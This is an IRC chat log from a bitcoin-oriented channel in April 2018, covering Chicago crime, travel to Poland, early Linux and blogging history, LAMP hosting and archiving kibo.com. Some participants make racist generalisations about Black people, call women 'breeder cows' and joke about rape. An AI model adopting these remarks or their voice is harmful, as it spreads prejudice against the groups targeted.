1791703;1522541266;BingoBoingo;!!deed http://p.bvulpes.com/pastes/qk0Yd/?raw=true 1791704;1522541271;deedbot;accepted: 1 1791705;1522541304;deedbot;http://qntra.net/2018/04/qntra-s-qntr-march-2018-report/ << Qntra - Qntra (S.QNTR) March 2018 Report 1791706;1522541422;mircea_popescu;and in other indian news : rotimatic is a roti prata maker. it weighs 18kgs, has about 50 sensors and 500 motors. 1791707;1522541503;BingoBoingo;That is a worrying sensor to motor ratio 1791708;1522541646;mircea_popescu;ikr. 1791709;1522541700;BingoBoingo;I have to wonder... Did Uber make it? 1791710;1522541729;mircea_popescu;nah. http://btcbase.org/log/2018-03-29#1791053 1791711;1522541729;a111;Logged on 2018-03-29 20:13 mircea_popescu: in other lulz, news from india : tata came up with a $2500 car. "nano". it has... no 0-60, because it goes 45 at the most. 1791712;1522541771;mircea_popescu;(since it's catholic easter, here's easter egg bonus lulz from romania : roti is how you say wheels.) 1791713;1522541791;BingoBoingo;lol 1791714;1522541803;deedbot;http://www.thedrinkingrecord.com/2018/03/31/milestones-in-language-immersion/ << Bingo Blog - Milestones In Language Immersion 1791715;1522541829;BingoBoingo;^ I saw this http://trilema.com/2015/the-best-biggest-bitcoin-derps-on-welfare-or-the-misadventures-of-young-josh-garza-jonah-dorman-eric-capuano-and-brian-klein/ earlier and figured it was time for another dispatch 1791716;1522541882;BingoBoingo;!~later tell douchebag ^ the above logline has some interesting history 1791717;1522541899;mircea_popescu;o yeah speaking of which, hey douchebag whatever happened to that tea chick ? 1791718;1522541962;mircea_popescu;imagine the waitresses of today. loose hundred dollar bills and trips to costa rica are such a common everyday occurence in their lives, they don't even have to go chasing. let opportunity chase after the broad instead, is it postmodernism or innit?!?!?! 1791719;1522541999;BingoBoingo;Seriously 1791720;1522542031;BingoBoingo;They again just about everybody in this country is "on vacation" for some definitions of vacation. 1791721;1522542031;mircea_popescu;if they all lived in palaces it'd be one thing, but i've seen the louse traps. 1791722;1522542051;mircea_popescu;yeah, aerosmith's "permanent vacation". brain checked out. 1791723;1522542099;BingoBoingo;Or they have gone to exotic places like paraguay. 1791724;1522542137;BingoBoingo;Which may be exotic for people from anywhere but Uru- 1791725;1522542308;mircea_popescu;i guess. 1791726;1522542348;BingoBoingo;Kinda like going to the Ozarks when you already live in St Louis 1791727;1522542354;mircea_popescu;or they despise themselves so much (as the direct and also necessary result of spending all their time involved with absolutely nothing else) that they automatically discount anything that happens to them by like 99.9999999%. because, as the wise timuruc once said, "if you were a millionaire you wouldn't be talking to me" 1791728;1522544170;mircea_popescu;in other http://btcbase.org/log/2018-03-31#1791647 : robotwisdom.com a) ran 1995 to 2006. notwitstanding the guy's only 60 or so ; and b) only exists as offline copies now. because... 1791729;1522544170;a111;Logged on 2018-03-31 16:40 mircea_popescu: i would really like a list of "all personal blogs older than a decade" right about now. 1791730;1522544287;mircea_popescu;(guy, notably, is the ~only ustard "literary critic" to have actually read joyce's manuscripts. and you have to hear of this from me because the pantsuit is busy discussing the pseudoachievements of black chicks or w/e the fuck they do.) 1791731;1522544530;mircea_popescu;https://twitter.com/robotwisdom linked for drama ; apparently brain fell down exact same hole as http://trilema.com/2011/ahahahahahaaaaa/ (paul goma was a big deal briefly in the 60s ; but it didn't take). 1791732;1522545112;mircea_popescu;jesus christ why is peterme.com orange ;/ and what the fuck is this, one self-promotion item from jan 2017, another pushing a book from august 2016 and a third from april ? jesus christ these people lack any insides already. 1791733;1522545315;deedbot;http://deedbot.org/bundle-516045.txt 1791734;1522545558;mircea_popescu;http://links.net/daze/17/01/26-i-was-searching-the-web-for-information-on-lipstick-and-saw-your-excellent-post-catdick.html << aaand here's justin hall being a total n00b. 1791735;1522546425;mircea_popescu;anyway, the fact that none of the early bloggers were actually literate minds shows. to give up the power of literature for the lure of "oral history" ? madness. 1791736;1522547881;mircea_popescu;http://www.cs.cmu.edu/~awb/linux.history.html << early history of linux is probably important since we're doing so many start-of-world things. note how it was never intended to be an os, it was intended to be a "a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones" in order to... "it was a project to teach me about the 386". 1791737;1522547922;mircea_popescu;considering also "Simply, I'd say that porting is impossible. As already mentioned, it uses a MMU, for both paging (not to disk yet) and segmentation. It's the segmentation that makes it REALLY 386 dependent (every task has a 64Mb segment for code & data - max 64 tasks in 4Gb. Anybody who needs more than 64Mb/task - tough cookies)." i'd say it actually broadly lives up to the original design -- linux is a fine non-professiona 1791738;1522547922;mircea_popescu;l approach for one hobbist in finland to lift into his own head the gnarl of 386. 1791739;1522547945;mircea_popescu;precious little ELSE it does, but then again my screwdriver also doesn't juice oranges. 1791740;1522547949;mircea_popescu;not very well, at any rate. 1791741;1522554143;douchebag;mircea_popescu: not sure what happened to her, i could send her a msg on discord 1791742;1522554200;douchebag;i got a few girls who wanna come in here for the offer, but I was sleeping most of the day 1791743;1522554213;douchebag;so I wasn't there to explain what the hell to do 1791744;1522554396;mod6;Lords and Ladies of The Most Serene Republic, The Bitcoin Foundation presents The State of Bitcoin Address for the month of March: http://therealbitcoin.org/ml/btc-dev/2018-April/000294.html 1791745;1522554835;douchebag;Is everyone doing well today? 1791746;1522555475;mircea_popescu;doin' great. 1791747;1522555485;douchebag;nice nice 1791748;1522555500;douchebag;just heard some gunshots 1791749;1522555509;douchebag;wonder what that could be... 1791750;1522555525;douchebag;I'm glad I'm getting out of this shithole city very soon here 1791751;1522555528;mircea_popescu;"law enforcement" ? 1791752;1522555550;douchebag;mircea_popescu: I live in South Chicagoland, so that sort of thing is pretty "normal" here 1791753;1522555559;mircea_popescu;BingoBoingo used to live there iirc. 1791754;1522555570;douchebag;If you go to the ghetto side of town, you see houses with bullet holes in some of the houses 1791755;1522555592;mircea_popescu;hey, there's a whole facade riddled with bullet holes in downtown timisoara 1791756;1522555598;mircea_popescu;left from 1989 though. 1791757;1522555615;douchebag;I'm just glad I'm getting out of this shithole very soon 1791758;1522555623;mircea_popescu;where to ? 1791759;1522555645;douchebag;Travelling Europe 1791760;1522555655;mircea_popescu;so what, become a gypsy ? 1791761;1522555657;douchebag;Going to end up getting citizen and whatnot once I find a place to settle down 1791762;1522555663;mircea_popescu;a 1791763;1522555688;douchebag;I have a full time job working remotely, so I'll be just fine over there 1791764;1522555695;mircea_popescu;indeed. 1791765;1522555765;douchebag;Just not happy here anymore, haven't been for a long time. It's not a good sight to see everything going to hell and there's nothing I can do about it except leave 1791766;1522555784;mircea_popescu;seems to be the common experience of a lot of people. 1791767;1522555791;mircea_popescu;in fact, of most non-retarded white people. 1791768;1522555827;douchebag;This was a somewhat decent town when I was growing up, there were still the bad sides of town. But now there's homeless people EVERYWHERE, drug addicts, gang members, ect.. 1791769;1522555840;douchebag;I have a house full of crack dealers who just moved in adjacent to me 1791770;1522555850;mircea_popescu;~nothing left for people to do. 1791771;1522555880;douchebag;It's mainly an issue of the whole mentality where people think they're entitled to success 1791772;1522555925;douchebag;Every black just seems to think their only chance for success is to become a famous rapper, and if they're not a famous rapper they choose to sell drugs instead of working a real job 1791773;1522555931;mircea_popescu;well, net access compressed the space of perceived possibility. 1949 people read about a murder done for 50k and thought it made sense. today's kids think a job that doesn't pay 1mn a year isn't really worth getting out of bed ; let alone good enough to commit murder. 1791774;1522555952;mircea_popescu;and from the other side of the double whammy, there.is.literally.nothing.to.do. 1791775;1522555966;douchebag;mircea_popescu: I know people around here who would kill for $800 1791776;1522555983;douchebag;Considering murder is glorified by modern rap music 1791777;1522555990;trinque;you're in chiraq aren't you? 1791778;1522555993;douchebag;Yep 1791779;1522556012;douchebag;Slangin n bangin rock on the block, poppin shots at the opps, fuck the cops seems to be the mentality 1791780;1522556038;mircea_popescu;used to be that any stiff capable of walking could get a job. there are NO jobs now. nobody with an iq under 150 is or can be useful for anything ; except of course if female for the http://trilema.com/2016/an-immodest-proposal/#selection-53.0-71.1 purpose 1791781;1522556045;mircea_popescu;(which is why all the "SSI" and foodstamps etc bs) 1791782;1522556089;douchebag;I've had many jobs, in fact every job I have ever applied to - I got the job 1791783;1522556090;mircea_popescu;so yes, obviously dudes will go about enforcing the chaining on the state-supported breeder cows. what the fuck else, "go to new york to be a writer" ? 1791784;1522556117;mircea_popescu;douchebag the "no jobs -- nothing useful for normie to do" is a statistical argument, can't be invalidated by example. 1791785;1522556151;douchebag;Well, every job I have ever applied to - I got the job. It doesn't seem to be a lack of jobs, it's a lack of will to work like a normal person 1791786;1522556175;mircea_popescu;right. give me an example ? 1791787;1522556176;trinque;horse shit, where are the great projects of mid last century to entomb the ablebodied men in wet concrete? 1791788;1522556227;mircea_popescu;trinque consider this lulzy angle -- in 1940 they could get a few hundred to about 1200 or so young men to go up on a boat. wake up every day, clean the deck, no girls for two years. 1791789;1522556229;douchebag;Working at a bar bussing tables, working at a furniture store moving boxes, working at a shipping facility, working at a security firm 1791790;1522556248;mircea_popescu;imagine if they had to man the pacific fleet today. what the fuck, 1 mn draftees per ship, shoot 10k a day for rank failure. 1791791;1522556268;mircea_popescu;douchebag do you see the "no economic utility" approach re all those jobs ? 1791792;1522556327;douchebag;Yes 1791793;1522556355;douchebag;However, sometimes you gotta do what you gotta do to get by and it doesn't have to involve robbing people or selling crack 1791794;1522556372;mircea_popescu;yes, and good for you if you manage but don't be surprised when most don't. that's the nature of statistics. 1791795;1522556379;trinque;crack's there, where other things aren't 1791796;1522556422;mircea_popescu;who could have predicted (tm) that "we'll make an economy out of doing each other's laundry" nonsense will soon devolve of "we're stuck here, crabs in a pot, trying to sling an array of pointless dopes on each other". 1791797;1522556430;douchebag;I don't know a single person who doesn't use drugs here. Whether it be weed or shotting heroin up your arm 1791798;1522556440;douchebag;shooting* 1791799;1522556460;mircea_popescu;douchebag or thinking they're "entrepreneurs" headed to sf or "actresses" headed to hollywood or "talented" headed to shitty-platform.com or so on. 1791800;1522556467;douchebag;Yes 1791801;1522556471;douchebag;Oh my god... 1791802;1522556479;mircea_popescu;there is no substantial difference between smoking crack and checking your roth ira 1791803;1522556481;douchebag;That resonates very well with me 1791804;1522556525;douchebag;Most people I know, especially college students seem to think that they're going to be famous - and if they're not famous they keep reaching towards unachievable goals 1791805;1522556536;douchebag;Some of them even admit to having no skill - yet still feel entitled 1791806;1522556538;mircea_popescu;douchebag you ever saw tlp btw ? i guess you might enjoy. iirc he also lived somewhere great-lakes-ish. even got held up by a "patient" once 1791807;1522556585;douchebag;mircea_popescu: I've got bullet fragments lodged in my leg due to a driveby shooting at a gas station 1791808;1522556647;mircea_popescu;in other "motherfucking hell" : linux got " US/German/French/Finnish keyboards" in v 0.11! along with other boneheaded idiocies like "code/data sharing between unrelated processes". wonder of wonders, there was actually NO philosophical community here, since the get-go. pure incidentals. 1791809;1522556654;mircea_popescu;douchebag hey, me too, almost exactly. 1791810;1522556678;douchebag;What happened w/ your situation? 1791811;1522556692;mircea_popescu;that's still a mystery. 1791812;1522556740;douchebag;Fucked up thing about my situation, a week prior I was at a different gas station and bullets went flying there. Didn't get hit 1791813;1522556749;douchebag;Next week I get shot in the fucking leg 1791814;1522556756;douchebag;while pumping gas 1791815;1522556820;mircea_popescu;http://btcbase.org/log/2017-09-30#1718876 1791816;1522556820;a111;Logged on 2017-09-30 20:05 mircea_popescu: the only extra hole in my hide i acquired through ricochet under car, nearly lost a knee. 1791817;1522556853;douchebag;Glad you're okay friend, shit's crazy 1791818;1522557021;mircea_popescu;somehow i never cared that much. 1791819;1522557053;douchebag;I'm just glad I'll be awake from here in about two months 1791820;1522557064;douchebag;away* 1791821;1522557074;mircea_popescu;sounds like a sound plan you got, check out the euro hussies, find a spot to settle down somewhat. 1791822;1522557105;douchebag;Yeah I can't wait 1791823;1522557347;douchebag;Can't wait to try some of the foods - and my girlfriend is a great cook and loves cooking for me 1791824;1522557396;mircea_popescu;you never been outside of the us huh ? that may promise to be quite the shock, like kid born in prison getting out. 1791825;1522557398;douchebag;I'll be in Poland staring off, any Polish foods you'd suggest me trying? 1791826;1522557437;mircea_popescu;i dunno about specifically polish, but sure, try the pirogi, try the blinyii, they should be capable of doing the north-eastern stuff well enough. 1791827;1522557451;douchebag;and no, I've never been in any where farther than the surrounding states of Illinois 1791828;1522557456;mircea_popescu;try all the soups once or twice ; starting with borrscht and move down. 1791829;1522557486;mircea_popescu;but really, just try everything. in restaurants! good ones! 1791830;1522557498;douchebag;That's the plan! 1791831;1522557528;mircea_popescu;were in poland were you going ? warsaw was it ? 1791832;1522557534;douchebag;Gdansk 1791833;1522557551;mircea_popescu;bistro de paris ah. 1791834;1522557560;mircea_popescu;hm. 1791835;1522557573;douchebag;I'm excited to see the sea for the first time 1791836;1522557579;douchebag;Especially during the summer 1791837;1522557598;mircea_popescu;it's a shitty sea though. but better than nothing i guess. 1791838;1522557624;douchebag;Oh yeah, I realize that - I just think it'll be nice to finally see the sea 1791839;1522557646;mircea_popescu;they actually had a great pirogi place in gdansk but i don't remember it now. somewhere downtown. 1791840;1522557649;douchebag;I've been to Illinois, Indiana, Michigan, Missouri, Tenessee, and Wisconsin 1791841;1522557694;douchebag;Awesome, can't wait to try it man. You really don't understand how happy this makes me to know I'll be out of this shithole 1791842;1522557727;mircea_popescu;i've seen it before lol. 1791843;1522557978;*;trinque still doesn't mind TX, could be wrong 1791844;1522557989;trinque;but if douchebag can get out, go for it, see everything you can 1791845;1522558018;mircea_popescu;travel's important. especially for the young squirt. 1791846;1522558076;douchebag;Texas sounds like one of the nicer states 1791847;1522558083;douchebag;I like the nationalism 1791848;1522558085;trinque;mostly because it doesn't want to be one 1791849;1522558086;mircea_popescu;but yes, if memory serves san antonio was the only livable city in the us, and that's in texas. 1791850;1522558087;trinque;aha 1791851;1522597400;mircea_popescu;hanbot so where's your blog ? 1791852;1522597523;hanbot;waiting for pizarro people to figure out php-mysql. from what i can tell they've been hacking at it all week. 1791853;1522597551;mircea_popescu;ugh 1791854;1522597567;mircea_popescu;ben_vulpes what is she talking about "? 1791855;1522598309;ben_vulpes;user-local MySQL install is the last roadblock 1791856;1522598369;ben_vulpes;http://logs.bvulpes.com/pizarro?d=2018-3-29#321883 1791857;1522598369;mimisbrunnr;Logged on 2018-03-29 16:45 asciilifeform: i would like to prove that 1995-style unixdir 'a la static' hosting is possible today, and with mp's php. 1791858;1522598463;ben_vulpes;asciilifeform discovered that it is impossible to get a per-user fastcgi hosting arrangement in place, as both apache and i believe nginx desperately want root 1791859;1522598512;ben_vulpes;so i set up per-user fpm pools which work, but i'm at sea on how asciilifeform put together and ran his user-local mysql install. 1791860;1522598547;ben_vulpes;cutting through a bunch of vines that the rest of the worlds use of vm's has let grow over useful, low-overhead tech. 1791861;1522598907;mircea_popescu;user-local mysql ? 1791862;1522598912;mircea_popescu;but why ?! 1791863;1522598992;mircea_popescu;now look here you nutjobs. mysql run once per user is WORSE a situation than the kernel run once per user. both apache and mysql are made to be one-for-all. this is not something you can negotiate by yourselves on the quiet in a day. 1791864;1522599000;mircea_popescu;mysql has a permissions structure, why not fucking use it. 1791865;1522599033;mircea_popescu;and moreover, when you tell me it's gonna be a day a week ago and then send your people on an insane mission through the jungle to build you a mountaintop aircraft submarine, you'd better fucking say something. 1791866;1522599038;mircea_popescu;what, you thought nobody'd notice ? 1791867;1522599076;ben_vulpes;no, i thought the noticing would happen of what was being said over in the boatyard 1791868;1522599094;ben_vulpes;i'll be sure to file updates here as well going forward 1791869;1522599211;mircea_popescu;nevermind filing fucking updates. get the hounds off the insanity of chasing "user-local mysql", if it's what i imagine it is. 1791870;1522599238;mircea_popescu;the ONLY reason lamp is even fucking useful, at all, is that the idiots in charge of the shitmachine got a web thing that could be cooked in ~2 hours. 1791871;1522599251;mircea_popescu;you can't possibly take more than that to get the thing up and running. now get to it. 1791872;1522599429;ben_vulpes;k 1791873;1522600618;mircea_popescu;meanwhile in other nostalgia, kibo still breathes! http://www.kibo.com/kibokill/ << check out the GUI shots. 1791874;1522602444;deedbot;http://www.thedrinkingrecord.com/2018/04/01/growing-disgust/ << Bingo Blog - Growing Disgust 1791875;1522602967;mircea_popescu;BingoBoingo mounth ? 1791876;1522602999;BingoBoingo;ty fxd 1791877;1522603114;mircea_popescu;casado/cansado huh 1791878;1522603120;mircea_popescu;i think they know what they're doing. 1791879;1522603222;BingoBoingo;mircea_popescu: Aha, they do 1791880;1522603241;deedbot;http://qntra.net/2018/04/more-than-a-week-after-ransomware-strike-us-municipality-remains-crippled/ << Qntra - More Than A Week After Ransomware Strike US Municipality Remains Crippled 1791881;1522603288;mircea_popescu;lmao jonah@geniusesatwork.com 1791882;1522603301;mircea_popescu;jesus christ there's solid comedy gold in the trilema mounthains 1791883;1522603350;BingoBoingo;There is so much comedy gold there 1791884;1522603428;BingoBoingo;!!up zineKing 1791885;1522603428;deedbot;zineKing voiced for 30 minutes. 1791886;1522603525;BingoBoingo;zineKing: Who is your daddy, what does he do, and how does he unpack the gnu symbol in your head today? 1791887;1522604670;BingoBoingo;http://btcbase.org/log/2018-04-01#1791878 << On this point the Northern Latinas, Venezolanas y Peruanas (And Chileñas though they aren't too much more Northern) know what they are doing. As long as the response is playful they remain worshipful. Uruguayas and it seems most Argentinas... whatever triggers their Laughs-Estrogen-Fun cycle seems to be broken. Deeply. 1791888;1522604670;a111;Logged on 2018-04-01 17:18 mircea_popescu: i think they know what they're doing. 1791889;1522604692;mircea_popescu;yawell. 1791890;1522604695;mircea_popescu;not everyone should reproduce. 1791891;1522604877;BingoBoingo;True. Still not sure where all the children come from here, but they sure do love making a show out of torturing their parents. 1791892;1522605060;BingoBoingo;Last Sunday I had the priviledge of seeing one of the little monsters dive into the foot of a male probably relative (can't tell if cuck or father) and got himself good and kicked in the head while tripping the victim. 1791893;1522605141;mircea_popescu;i think this is rape. 1791894;1522605189;BingoBoingo;Or course it is. 1791895;1522605255;BingoBoingo;And colonialism 1791896;1522605379;BingoBoingo;I am rather surprised this place isn't more popular with the alt-alt white Pepe set. No good reason Dixie can't move further South. 1791897;1522605412;mircea_popescu;http://btcbase.org/log/2018-03-26#1789746 << that. 1791898;1522605412;a111;Logged on 2018-03-26 16:06 mircea_popescu: anyway. boston managed to make "the defining question" be "what does america want to see ?" and then managed to convince the midwest that what california people think is hip is bostonolade ; then took those numbers and showed california that "what america wants to see!!" is bostonolade. 1791899;1522605433;mircea_popescu;boston told them it's impossible to travel, no such thing as learning languages or handling non-pantsuit fiatola currency is possible for human hands and minds. 1791900;1522605451;mircea_popescu;and they believe, because that's what it means to be a retard : you trust your parents. even the ones that whore you out since you were 3yo. 1791901;1522605989;BingoBoingo;It's no small irony that the Make Alt-Alt Again folks... Or USian rebels in general will come so close to getting things right... Then they drink the Bostonolade that keeps them home. 1791902;1522606001;BingoBoingo;Identify the empire is collapse, sure they can do it. 1791903;1522606013;mircea_popescu;not more than the "rebelious" preteens that still go home to eat. 1791904;1522606044;BingoBoingo;Contemplate GTFO? Nah they have a zombie apocalypse to wait for. 1791905;1522606105;deedbot;http://trilema.com/2018/heres-what-hasnt-changed/ << Trilema - Here's what hasn't changed 1791906;1522606113;BingoBoingo;Or a bunker to feed while they wait for Kim Jung to save them 1791907;1522606672;mircea_popescu;^ "Web browsers are fragile assemblies of bugs, held together with Hello Kitty stickers." 1791908;1522606707;BingoBoingo;http://www.kibo.com/style/kibo-style.css << This is a beauty 1791909;1522609079;mircea_popescu;basically, nothing has happened in twenty years. 1791910;1522609970;phf;i'm also disappointed that battlestar galactica date can not be reversed into system date to figure out when the messages were posted. 1791911;1522610508;mircea_popescu;phf early dec 1998 1791912;1522610521;mircea_popescu;it's somewhat of a companion to the "what's changed" piece 1791913;1522610682;mircea_popescu;https://www.wired.com/1993/04/kibo-is-god/ << back when wired was impossible colors and fell over itself to suck our cock, rather than pompously pretend to tell anyone what's what. 1791914;1522610689;mircea_popescu;aanyway. lobbes can the kibo site be added to archival ? 1791915;1522610953;ave1;mircea_popescu, http://btcbase.org/log/2018-03-26#1789665, how do you get to 80 for for the 25 case? 1791916;1522610953;a111;Logged on 2018-03-26 14:08 mircea_popescu: https://steemit.com/introducemyself/@anonymint/introspection-interlude << in other bizarre. maybe someone point out to the dude that there's a 2 and a 5 in any 10, and since the 5 is in short supply n! will have one zero for each 5, two for each 25 and 3 for each 625, meaning 1000! will have 200 + 80 + 1. 1791917;1522610963;ave1;seems to me it has te be 40 1791918;1522610989;mircea_popescu;ave1 1000 / 25 = 40, each of which is two instances of 5, so 80 1791919;1522611073;ave1;yep but the first was already counted in the 5 1791920;1522611088;mircea_popescu;ah right you are. 1791921;1522611106;mircea_popescu;i guess i was wise enough to do the 625 correcty, so all bases are covered. 1791922;1522611119;ave1;yes 1791923;1522611331;mircea_popescu;in other lulz, catholic easter is on 1st of april this year ? 1791924;1522611351;mircea_popescu;how perfectly postmodernist. 1791925;1522612210;jurov;it aligned with resurrection so that's okay. few years ago it aligned with crucifixion. 1791926;1522623632;ben_vulpes;!!hanbot 1791927;1522623634;ben_vulpes;!!key hanbot 1791928;1522623636;deedbot;http://wot.deedbot.org/EA0FAD90985B3025576A5061454B0FC0BC07B87E.asc 1791929;1522627011;mircea_popescu;holy shit kibo's signature includes a reference to http://trilema.com/2011/ochiul-lui-argorn-de-jim-theis/ 1791930;1522627013;*;mircea_popescu falls over 1791931;1522627786;douchebag;mircea_popescu: are you a member of the mile high club 1791932;1522627893;mircea_popescu;is that "people who fuck in an airplane" ? 1791933;1522627904;douchebag;yes 1791934;1522627907;mircea_popescu;sure. 1791935;1522627930;douchebag;any suggestions for becoming a part of this exlclusive club without getting caught 1791936;1522627946;mircea_popescu;yes. not caring about getting caught. 1791937;1522627960;douchebag;Awesome 1791938;1522628053;mircea_popescu;http://trilema.com/wp-content/uploads/2011/10/filosoful-luminii-de-neon.png << in other antiquary. 1791939;1522631104;mircea_popescu;"HOWEVER YOU CAN'T SUE ME FOR SAYING ANY OF THIS BECAUSE IF YOU SUE ME YOU'D HAVE TO QUOTE ME IN COURT AND THEN I'D SUE YOU FOR QUOTING THIS COPYRIGHTED (C) MESSAGE!!! MY COUSINS ARE ALL LAWYERS !!!!!" <<< turns out the whole SOPS thing actually originated as a usenet joke. 1791940;1522631294;lobbes;http://btcbase.org/log/2018-04-01#1791914 << If you wanna throw specific urls into the automated archive hopper, then just dump em in chan. 1791941;1522631294;a111;Logged on 2018-04-01 19:24 mircea_popescu: aanyway. lobbes can the kibo site be added to archival ? 1791942;1522631296;lobbes;Or did you mean you want me to mirror everything in, say, http://www.kibo.com/rawdata/ like I did with Uncle Al writings? Either way, I'll go ahead and mirror the stuff in /rawdata/; shouldn't take long at all 1791943;1522631304;mircea_popescu;like with uncle al yes 1791944;1522631320;mircea_popescu;want me to generate a sitemap for you or ? 1791945;1522631384;mircea_popescu;wget -m http://www.kibo.com 2>&1 | grep '^--' | awk '{ print $3 }' | grep -v '\.\(css\|js\|png\|gif\|jpg\|JPG\)$' > urls.txt 1791946;1522631430;lobbes;nice. aite, I'll let ya know once it is up 1791947;1522631433;mircea_popescu;ty 1791948;1522632678;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/z82eN/?raw=true 1791949;1522633881;asciilifeform;mircea_popescu: miskeyed 1791950;1522634115;asciilifeform;http://btcbase.org/log/2018-04-01#1791929 << this is a megaspoofclassic, i actually have it in dead tree 1791951;1522634115;a111;Logged on 2018-04-01 23:56 mircea_popescu: holy shit kibo's signature includes a reference to http://trilema.com/2011/ochiul-lui-argorn-de-jim-theis/ 1791952;1522634125;asciilifeform;'eye of argon' in orig 1791953;1522634258;lobbes;!!deed http://lobbesblog.com/billing/2018/q1/Birdman.txt 1791954;1522634261;deedbot;accepted: 1 1791955;1522634262;lobbes;!!deed http://lobbesblog.com/billing/2018/q1/diana_coman.txt 1791956;1522634266;deedbot;accepted: 1 1791957;1522634270;lobbes;^^ q1 auction bot billz (slow quarter!). Mainly for accounting purposes; no rush on collecting due to eulora servers being down and the fact that the sums are a mere 96 satoshi each 1791958;1522634290;*;asciilifeform bbl 1791959;1522634510;mircea_popescu;word. 1791960;1522634718;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/szODR/?raw=true 1791961;1522634723;mircea_popescu;sorry bout that 1791962;1522635048;lobbes;btw I'm loving this multi-chan log-quote ability ben_vulpes. I bet this becomes a soft requirement for logotron relevancy as the peripheral 'castles' continue to be added/populated 1791963;1522635318;deedbot;http://deedbot.org/bundle-516215.txt 1791964;1522635411;asciilifeform;mircea_popescu: http://p.bvulpes.com/pastes/dbjEe/?raw=true 1791965;1522635489;mircea_popescu;certainly a fine residual incentive for lord to maintain logotron -- get the ability to reference castle logs in here. 1791966;1522635522;mircea_popescu;asciilifeform easter, possibly. let's see tomorro. 1791967;1522635530;asciilifeform;aa ok. aite 1791968;1522653000;deedbot;http://trilema.com/2018/three-on-a-match/ << Trilema - Three on a match 1791969;1522681690;asciilifeform;meanwhile, in other veryolds, https://www.kix.in/2008/06/19/an-alternative-to-shared-libraries 1791970;1522681737;asciilifeform;^ ( goes without saying? ) for pro entomologists only 1791971;1522684467;deedbot;http://trilema.com/2018/obscure-terms/ << Trilema - Obscure terms. 1791972;1522685143;mircea_popescu;in other items perhaps of interest to the specialist, apparently i had forgotten the link for http://trilema.com/2018/lets-read-together-uncle-al-schwartz-hexadecimal-dependency/#footnote_9_78266 ; now added. 1791973;1522685370;mircea_popescu;"having experienced several variants, i find it now saves time just to adopt the irrational position from the start." <<->> http://trilema.com/2014/how-to-deal-with-pseudoscience/ ; it is better to ignore random noise before examining it for coherence than after. 1791974;1522685370;mircea_popescu;"oh, but how does one know something's random noise afore the fact ? isn't that begging the question ?" you can't establish something is random ~after the fact~, nitwit, randomness is not a property of the string ~but of the method that produced it~. therefore, it's random noise because it comes out of an unknown source, duh! 1791975;1522685453;BingoBoingo;In other news, I think an Incan gave me a cold 1791976;1522685464;asciilifeform;or, how it is taught to young children, 'don't eat things picked up off the ground?' 'but what if they're delish' 'but consider' 1791977;1522685486;ben_vulpes;mircea_popescu: once upon a time there was an s.nsa expense line for ~"servers for nascent isp", would you sell one or both of those to pizarro? 1791978;1522685488;mircea_popescu;"but mp, I ~know~ the source" "no you fucking don't. what's discussed here is knowledge in the strong sense ; your lack of ability to know anything due to http://trilema.com/2014/the-problem-of-ideal-social-systems-reprint/ and http://trilema.com/2011/semiologia-semantica-si-viata/ type issues does not permit you to now claim knowledge out of the void. 1791979;1522685512;mircea_popescu;ben_vulpes you mean, of the servers asciilifeform is flying in ? 1791980;1522685539;ben_vulpes;mircea_popescu: yup 1791981;1522685543;mircea_popescu;asciilifeform are we selling ? 1791982;1522685655;asciilifeform;mircea_popescu: i would not be opposed to selling off 1 of the 2 spares ( either for pizarro-credits, as mircea_popescu earlier sold FGs, or for coin, or come combination of the 2 ) 1791983;1522685707;mircea_popescu;we have a main which is going to be the nsa / phuctor main machine and 3 spares was it ? or 2 ? 1791984;1522685724;asciilifeform;correct : 1, i call 'dulap-III' ; 2 spares . 1791985;1522685727;mircea_popescu;also, do you want to lamp the main phuctor item rather than use the vps + server minigame system ? i imagine it'd be easier to do python bindingd and w/e that way ? 1791986;1522685805;mircea_popescu;ben_vulpes what do you want to pay ? 1791987;1522685860;ben_vulpes;digging up specs and comps atm, will check in shortly 1791988;1522685895;mircea_popescu;aite. 1791989;1522685935;mircea_popescu;asciilifeform and the idea is to keep a spare there in any case, even if we don't use it for anything, "to make up for lost time", live a little as it were ? 1791990;1522685942;asciilifeform;correct. 1791991;1522685950;asciilifeform;given as we are 'on space station' 1791992;1522685953;mircea_popescu;i can see it. 1791993;1522686027;mircea_popescu;in other items of kibo-interest, salted roasted pistachios with milk make for a splendid breakfast. you shell a few, you take a swig ; you take a swig, you shell a few. 1791994;1522686478;mircea_popescu;aaand since i was doing spelunking, lulz item from 2011 : http://trilema.com/2011/de-ce-nu-ma-place-beranger-v4/#selection-139.0-139.124 1791995;1522686537;mircea_popescu;tl;dr : "superior" & "civilized" romanian (ie, exactly http://trilema.com/2017/in-case-you-were-wondering-where-all-the-worthless-nuland-drones-ended-up/ ) "does not like trilema" because "how dares the ney work times advertise it!! imagine, i was reading there like a good nuland drone, and what do they show me ? trilema!!! THE EVIL BADGUY FROM MY COUTRY!!! THE WHOLE PANTSUIT SYSTEM IS BREAKING DOWN!!!111" 1791996;1522686585;mircea_popescu;incredibly enough, original item still there even! https://twitter.com/ludditus/status/51677863652491264 1791997;1522686832;mircea_popescu;(he also hates bitcoin, because how dared it make me rich. and in general -- let's just say if he sees you driving my car he'll hate you too) 1791998;1522686932;asciilifeform;any particular reason ? ( or does he simply despise folx whose names start with 'm', or wat ) 1791999;1522687247;mircea_popescu;dude thinks pantsuit is right ; hates the fact that i exist, and the way i tend to rub pantsuit nose in the necessary pantsuit failure / gloat at the success of my rape & "sociopathy" campaign REALLY gets his goat. 1792000;1522687265;mircea_popescu;basically cuck rage, but of a platonic rather than sexual nature. 1792001;1522687454;mircea_popescu;but anyway, in between "here's what the french atlantic said about german cars, bmw is worst ever" and retweets of "Having kids to give life meaning creates more lives that need meaning. Basically it’s a Ponzi scheme." he did entertain me for a few minutes, so not all is lost. 1792002;1522687477;mircea_popescu;imagine, dacia good, bmw and audi bad. a whole generation of dead romanians would cream SO HARD if they could see this. 1792003;1522687502;ben_vulpes;!~ticker --market all 1792004;1522687582;mircea_popescu;bwahahaha "bug in npm changes permissions on / file system destroys productions linux or unix boxes. “sudo npm” will chown “/“." 1792005;1522687605;mircea_popescu;it's kinda funny to delve into the other side on occasion. check out the "i'm an idiot" style quotes, be unsurprised they use "npm" to chown root 1792006;1522687625;mircea_popescu;(npm is a package manager for javascript) 1792007;1522687628;asciilifeform;http://btcbase.org/log/2018-02-22#1785542 iirc the item 1792008;1522687628;a111;Logged on 2018-02-22 18:38 ben_vulpes: https://github.com/npm/npm/issues/19883 